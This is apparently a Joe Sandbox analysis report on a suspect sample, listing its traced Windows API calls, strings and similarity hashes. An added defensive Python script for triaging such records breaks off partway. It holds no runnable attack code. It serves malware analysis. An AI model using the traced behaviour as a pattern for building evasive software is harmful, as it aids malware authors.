                                                                    • Part of subcall function 0040B610: ReadFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B744
                                                                    • Part of subcall function 0040B610: CloseHandle.KERNEL32(00000000), ref: 0040B760
                                                                  • GetProcessHeap.KERNEL32(00000000,00080000,00000001,00000000), ref: 0040BBCA
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BBD1
                                                                  • Sleep.KERNEL32(00002710,00000003), ref: 0040BC35
                                                                  • Sleep.KERNEL32(0002BF20,00000000), ref: 0040BD47
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BD77
                                                                  • HeapFree.KERNEL32(00000000), ref: 0040BD7E
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$MutexRelease$FileProcessSleep$AllocCloseCreateEnvironmentExpandFreeHandleObjectReadSingleStringsWait
                                                                  • String ID:
                                                                  • API String ID: 852835205-0
                                                                  • Opcode ID: cb922d948c341c4ec4f5cf48101532b27f292cf533eb1d70b440bbdce6734a4b
                                                                  • Instruction ID: dbe7561af554c473106a4ec3f17350c3c00e3f78ca735fbf8e53c6946bf8a5ce
                                                                  • Opcode Fuzzy Hash: cb922d948c341c4ec4f5cf48101532b27f292cf533eb1d70b440bbdce6734a4b
                                                                  • Instruction Fuzzy Hash: 2D51B3716483415FE710DB61DC85BABBBA4EB95304F04183EF584972E2EB789405CBAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88afcefbdea34149f5487bb4a4a4e8b1a015dd47fa542d46d12a5e79c65998e6
                                                                  • Instruction ID: 7989a7ec8bd3e7dc296c367a6cca705834e82284c665f1faf7c5f8b3083430bb
                                                                  • Opcode Fuzzy Hash: 88afcefbdea34149f5487bb4a4a4e8b1a015dd47fa542d46d12a5e79c65998e6
                                                                  • Instruction Fuzzy Hash: 09410571F01136ABDF207F67BC888BF7AA4EA45764F91412FF814A2280D73C4D518A9C
                                                                  APIs
                                                                  • lstrlenA.KERNEL32 ref: 0041ADCA
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: .$D$T
                                                                  • API String ID: 1203007601-2113802054
                                                                  • Opcode ID: f4b806bf02d42cab6389b1d5623ed4ac62eeef1efafac6ca423e87d2abbb3ba1
                                                                  • Instruction ID: 3bc75d6c25ee899c0d3cbf15c6baa3f2471e4579f1b3dcf940514d54ae42f5c8
                                                                  • Opcode Fuzzy Hash: f4b806bf02d42cab6389b1d5623ed4ac62eeef1efafac6ca423e87d2abbb3ba1
                                                                  • Instruction Fuzzy Hash: 2731C1B621C3C19BC304EA2DD44169FBBD49BE5314F44486FF19583282DB68D548C7AF
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,004088C2,?,?,00000000,000000FF,?,00000000), ref: 00407780
                                                                  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,00000001,?,0000000A), ref: 004077A6
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,0000000A), ref: 004077C0
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,0000000A), ref: 004077D0
                                                                  • CloseHandle.KERNEL32(00000000,?,0000000A), ref: 004077D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Write$CloseCreateHandlePointer
                                                                  • String ID:
                                                                  • API String ID: 2529654636-0
                                                                  • Opcode ID: 9b37f0a862f01d551fb1315119285fc735368d34d06a2e386bcb12519b4e4b4b
                                                                  • Instruction ID: 1453553940a4d3892de4ff384dbac704556b8781b2e4a3aa95a78d14f1d764be
                                                                  • Opcode Fuzzy Hash: 9b37f0a862f01d551fb1315119285fc735368d34d06a2e386bcb12519b4e4b4b
                                                                  • Instruction Fuzzy Hash: 910152B2345210BBF224D665DC85FABB35CFB45B55F604529F301AB1C0D7B0B912866E
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00429D66,0042754D,00000000,0042E878,00000008,004275A4,?,?,?,004255E1,00000004,0042E528,0000000C,004274A4), ref: 00426F6A
                                                                  • FlsGetValue.KERNEL32(?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426F78
                                                                  • SetLastError.KERNEL32(00000000,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426FCE
                                                                    • Part of subcall function 0042AF1A: __lock.LIBCMT ref: 0042AF5E
                                                                    • Part of subcall function 0042AF1A: HeapAlloc.KERNEL32(00000008,?,0042EF98,00000010,00426F90,00000001,0000008C,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A), ref: 0042AF9C
                                                                  • FlsSetValue.KERNEL32(00000000,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426F9F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00426FB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: cf15b98bab8d1defd9364abf7e131804ac3567f7b1877ef76dd4d84766d46405
                                                                  • Instruction ID: f63654c1ee938a50a5afa31d3a4a151140225177cbe4647d27af6bf58e16b5fd
                                                                  • Opcode Fuzzy Hash: cf15b98bab8d1defd9364abf7e131804ac3567f7b1877ef76dd4d84766d46405
                                                                  • Instruction Fuzzy Hash: 42F0FC317017219FDB302F61BE0D6463BE0EF04761B520539F681962E0CBB48805DB5D
                                                                  APIs
                                                                  • SetEvent.KERNEL32(0000011C,?,00000000,00000001,00415108), ref: 0041EF12
                                                                  • SetEvent.KERNEL32(00000128), ref: 0041EF20
                                                                  • SetEvent.KERNEL32(0000012C), ref: 0041EF2B
                                                                  • SetEvent.KERNEL32(00000124), ref: 0041EF36
                                                                  • SetEvent.KERNEL32(00000120), ref: 0041EF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Event
                                                                  • String ID:
                                                                  • API String ID: 4201588131-0
                                                                  • Opcode ID: c5f2bf39e6656d233596ec134f051eeb9b07fd22e5f32040d0a10a1e3cd4c5e3
                                                                  • Instruction ID: 92241c2d29be1143f2a9536055d46b80d7f207951b744ccd9958107ee56c1688
                                                                  • Opcode Fuzzy Hash: c5f2bf39e6656d233596ec134f051eeb9b07fd22e5f32040d0a10a1e3cd4c5e3
                                                                  • Instruction Fuzzy Hash: F6F08273710910A7C31896F99C899EAE399FB8C395B45062AEA19D7310CA3CAC1047EC
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004264B6
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004264C2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004264CA
                                                                  • GetTickCount.KERNEL32 ref: 004264D2
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004264DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: 7df64b2976afb430f347675c980c9b5000278784bc7ff6d537d0765b03531c1e
                                                                  • Instruction ID: 499c131aa02166e40c80eeea4be7d3552c431a5fdd0afb938acd6548f02731da
                                                                  • Opcode Fuzzy Hash: 7df64b2976afb430f347675c980c9b5000278784bc7ff6d537d0765b03531c1e
                                                                  • Instruction Fuzzy Hash: BCF0B271E00124ABDB20EBB5ED4859FB7F8FF08251BC60576D801E7160EA34A9558B88
                                                                  APIs
                                                                  • ResetEvent.KERNEL32(0000011C,?,00000000,00000001,00415134), ref: 0041EF67
                                                                  • ResetEvent.KERNEL32(00000128), ref: 0041EF76
                                                                  • ResetEvent.KERNEL32(0000012C), ref: 0041EF81
                                                                  • ResetEvent.KERNEL32(00000124), ref: 0041EF8C
                                                                  • ResetEvent.KERNEL32(00000120), ref: 0041EF97
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: EventReset
                                                                  • String ID:
                                                                  • API String ID: 2632953641-0
                                                                  • Opcode ID: 4822540d4da0aa7164793d8268a4d29bb95e7092dff5d4a8231710eff046bdde
                                                                  • Instruction ID: fc480dfa26fb09fbbc65d8aef6d91afcac74ba489442c4a45ccb12b9350b78a5
                                                                  • Opcode Fuzzy Hash: 4822540d4da0aa7164793d8268a4d29bb95e7092dff5d4a8231710eff046bdde
                                                                  • Instruction Fuzzy Hash: 8DF039B3211A009BC32096FACCC5EC7A3DAABCC305F190829A21DC3200C93CE8418778
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00422278
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0042229B
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 004222BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: fwe
                                                                  • API String ID: 3188754299-4005368934
                                                                  • Opcode ID: 9085168eafed1b4902fe1ac0c1bd680c0aa40f9c6ed121b420b30641bbf5303a
                                                                  • Instruction ID: 76594a64a599093f323b53c7ed8c786e31d7372582f6e569f4210dc002227436
                                                                  • Opcode Fuzzy Hash: 9085168eafed1b4902fe1ac0c1bd680c0aa40f9c6ed121b420b30641bbf5303a
                                                                  • Instruction Fuzzy Hash: CE315B3160879157CB21D6347820BFBF7D1AFD4300FA00B69E8D8C3281DBB69845C396
                                                                  APIs
                                                                  • FlsFree.KERNEL32(00000005,0042720A,?,0042E598,00000060), ref: 00426F56
                                                                  • DeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0042720A,?,0042E598,00000060), ref: 0042749C
                                                                  • DeleteCriticalSection.KERNEL32(00000005,00000000,?,0042720A,?,0042E598,00000060), ref: 004274C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalDeleteSection$Free
                                                                  • String ID: h C
                                                                  • API String ID: 1584690612-3285481218
                                                                  • Opcode ID: 01f5279fd6fd29356f328ce173e54860964db3a701b0153208304f489ed11fa6
                                                                  • Instruction ID: 46e1f5d38daa45a4b8a1175150061cd4bbfd52aad6ded1a2a2748f1cabc2c9bd
                                                                  • Opcode Fuzzy Hash: 01f5279fd6fd29356f328ce173e54860964db3a701b0153208304f489ed11fa6
                                                                  • Instruction Fuzzy Hash: D2F0A432A0423097CA346A18BC855A6B6E89F49731B55573FE9E9E32A0C33C9C42866C
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0042EFE0,00000010,00427463,00000000,00000FA0,74DF0A60,00000000,00427125,00425E71,?,0042E598,00000060), ref: 0042B502
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0042B512
                                                                  Strings
                                                                  • InitializeCriticalSectionAndSpinCount, xrefs: 0042B50C
                                                                  • kernel32.dll, xrefs: 0042B4FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                  • API String ID: 1646373207-3733552308
                                                                  • Opcode ID: 268dcd9634f074ec502ce49ec15195abddda11da55df9ab9ea062583cc4446d2
                                                                  • Instruction ID: be9b0aabb06fe80ffec501557c266caa5c5a139848c1c9192b9c21e126a2179c
                                                                  • Opcode Fuzzy Hash: 268dcd9634f074ec502ce49ec15195abddda11da55df9ab9ea062583cc4446d2
                                                                  • Instruction Fuzzy Hash: EBF05470741335FACB10AFB2FD457593BA0EB04748F94452AE814D52A0D77C86819A6D
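The record above (0042B502/0042B512) resolves InitializeCriticalSectionAndSpinCount from kernel32.dll through GetModuleHandleA and GetProcAddress. That is the lookup the MSVC C runtime's own start-up code performs, and the records around it that the report attributes to LIBCMT (_UnwindNestedFrames, _strlen, __lock) together with the FlsFree/DeleteCriticalSection tear-down at 00426F56 are runtime code as well, so this call site by itself does not substantiate the "extensive use of GetProcAddress" signature; what matters is what the sample's other GetProcAddress sites resolve. The Python script below is an added example, not part of Joe Sandbox or of this report: it parses records in the layout printed here, keeps a function's direct calls apart from the "Part of subcall" entries the report repeats under every caller, and tags each record, treating a GetProcAddress whose every target is in an assumed list of CRT-resolved exports as boilerplate and anything else, including the "?" the report prints for an argument it could not recover, as dynamic API resolution worth a closer look. SAMPLE copies three records from this page in abbreviated form, CONSTRUCTED_RECORD is made up for contrast, and CRT_RESOLVED is this example's assumption.

```python
"""Triage helper for the per-function records of a Joe Sandbox report, in the
"APIs / Strings / Memory Dump Source / Similarity" layout printed above.
Added example, not Joe Sandbox code.  SAMPLE copies three records from this
report (abbreviated); CONSTRUCTED_RECORD is made up; CRT_RESOLVED is an assumption."""
import re

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "• Name.MODULE(arg,arg), ref: 0041EF67" or "• Name.MODULE ref: 00429532",
# optionally prefixed with "Part of subcall function 00426B77:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• API ID: ..."

# Assumption: kernel32 exports that MSVC CRT start-up code itself resolves with
# GetProcAddress (compatibility shims).  A record whose only GetProcAddress
# targets are in this set is compiler boilerplate, not the payload's own loader.
CRT_RESOLVED = {"InitializeCriticalSectionAndSpinCount", "FlsAlloc", "FlsFree",
                "FlsGetValue", "FlsSetValue", "EncodePointer", "DecodePointer"}


def parse_blocks(text):
    """One dict per function record; a record starts at each 'APIs' header."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = {"apis": [], "strings": [], "fields": {}}
                blocks.append(cur)
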